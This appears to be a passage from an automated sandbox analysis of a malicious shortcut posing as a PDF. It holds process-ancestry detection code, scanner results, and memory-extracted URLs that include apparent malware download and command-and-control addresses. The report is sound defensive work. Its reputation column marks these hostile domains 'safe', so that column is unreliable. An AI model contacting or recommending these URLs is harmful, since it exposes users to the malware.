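            hits.add(("AppData binary launched under wscript/cscript", e.pid))
        if me == "tar.exe" and any(in_user_dir(a.image) for a in chain[1:]):
            hits.add(("tar.exe extracting on behalf of an AppData binary", e.pid))
    return sorted(hits)
```

The rules walk the full ancestry rather than only the direct parent, which is what catches the persistence branch: php.exe under cmd.exe looks ordinary until you notice the wscript.exe two levels up, and tar.exe under cmd.exe is unremarkable until its grandparent turns out to live in AppData. In a real deployment the parent/child pairs map onto the Sigma rules named at the top of the report; the walk over ancestors is the extra step worth adding for loaders like this one that put a cmd.exe between every interesting link.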

Source | Detection | Scanner | Label
HateSpeech2024_Summary.pdf.lnk.bin.lnk | 24% | ReversingLabs | Shortcut.Trojan.Pantera
HateSpeech2024_Summary.pdf.lnk.bin.lnk | 27% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8ts.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\vcruntime140.dll | 0% | ReversingLabs |

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-C | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Social_Media_Report.pd | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Profes | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downlo | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Profess | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammLMEM | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_So | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Pro | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_d | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Soc | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloa | 0% | Avira URL Cloud | safe
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammMMC: | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammes | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Social_Media_R | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm( | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_down | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.e | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm...X5 | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm0 | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm/ | 0% | Avira URL Cloud | safe
http://www.zend.com/ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_do | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.ex | 0% | Avira URL Cloud | safe
http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30bE | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE- | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm7 | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammkCg | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERA | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammF | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammB | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-B | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVER | 0% | Avira URL Cloud | safe
http://rodgersluciecassy.com/mbp/apit.php | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammls | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm; | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAG | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammH | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammI | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammG | 0% | Avira URL Cloud | safe
http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z3 | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammL | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Soci | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammR | 0% | Avira URL Cloud | safe
https://myfilebuilders.com | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/P | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Social_Media_ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm-0 | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammP | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_dow | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_download | 0% | Avira URL Cloud | safe
https://www.php.netD | 0% | Avira URL Cloud | safe
http://bugs.php.net/report.php | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloade | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BO | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Profession | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samma | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm;.WSF;.WSH;.MS | 0% | Avira URL Cloud | safe
http://rodgersluciecassy.com/mbp | 0% | Avira URL Cloud | safe
https://myfilebuilders.c | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammj | 0% | Avira URL Cloud | safe
http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30r | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Social_Media_Report.pdf | 0% | Avira URL Cloud | safe
https://myfilebuilders.co | 0% | Avira URL Cloud | safe
http://rodgersluciecassy.com/mbp/down/ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/sammo | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm$global:? | 0% | Avira URL Cloud | safe
http://myfilebuilders.com | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professional_Social_Medi | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/samm~ | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/Professi | 0% | Avira URL Cloud | safe
https://myfilebuilders.com/php_bot_downloader_v2- | 0% | Avira URL Cloud | safe
No contacted domains info

Name | Source | Malicious | Antivirus Detection | Reputation
https://myfilebuilders.com/php_bot_downloader_ | powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/Professional_Social_Media_Report.pd | powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/Profess | powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-C | powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/Profes | powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/sammLMEM | mshta.exe, 00000005.00000003.1846315954.000001EB13BD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847163890.000001EB13BD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1855774349.000001EB13BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848132792.000001EB13BEB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/php/php-src/issues/( | tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000006.00000003.1665256909.000001B97E543000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://myfilebuilders.com/php_bot_downlo | powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/php_bot_d | powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/Pro | powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/Professional_So | powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD | php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | false | Avira URL Cloud: safe | unknown
https://myfilebuilders.com/php_bot_downloa | powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | false | |
            • Avira URL Cloud: safe
            unknown
            https://myfilebuilders.com/Professional_Socpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://myfilebuilders.com/sammMMC:mshta.exe, 00000005.00000003.1843743882.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885688982.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1884092790.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1889989783.000001EB0EFAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLNpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000006.00000003.1665256909.000001B97E512000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://myfilebuilders.com/sammesmshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://myfilebuilders.com/php_bot_downloaderpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://myfilebuilders.com/Professional_Social_Media_Rpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://myfilebuilders.com/samm(mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://myfilebuilders.com/php_bot_downpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.epowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.php.net/php.exefalse
                  high
                  https://myfilebuilders.com/samm...X5mshta.exe, 00000005.00000003.1885898533.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841817928.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883693311.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890206556.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848758754.000001EB0F024000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://myfilebuilders.com/samm0mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zend.com/php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://myfilebuilders.com/samm/mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1654335033.000002A9CD591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://myfilebuilders.com/php_bot_dopowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://myfilebuilders.com/Professional_powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.expowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30bEphp.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://myfilebuilders.com/samm7mshta.exe, 00000005.00000002.1888475276.000001E30CCA4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://myfilebuilders.com/sammkCgmshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://myfilebuilders.com/samm;powershell.exe, 00000004.00000002.1653965522.000002A9CB6D0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://myfilebuilders.com/sammBmshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://myfilebuilders.com/php_bot_downloader_v2-AVERApowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://myfilebuilders.com/sammFmshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-Bpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://go.micropowershell.exe, 00000007.00000002.1757475272.000001F40C769000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://myfilebuilders.com/php_bot_downloader_v2-AVERpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://myfilebuilders.com/sammlsmshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://rodgersluciecassy.com/mbp/apit.phpphp.exe, 00000018.00000002.2893070291.000001E12DC00000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.exepowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://myfilebuilders.com/sammImshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://myfilebuilders.com/sammHmshta.exe, 00000005.00000002.1889045951.000001E30E5E0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z3php.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpfalse
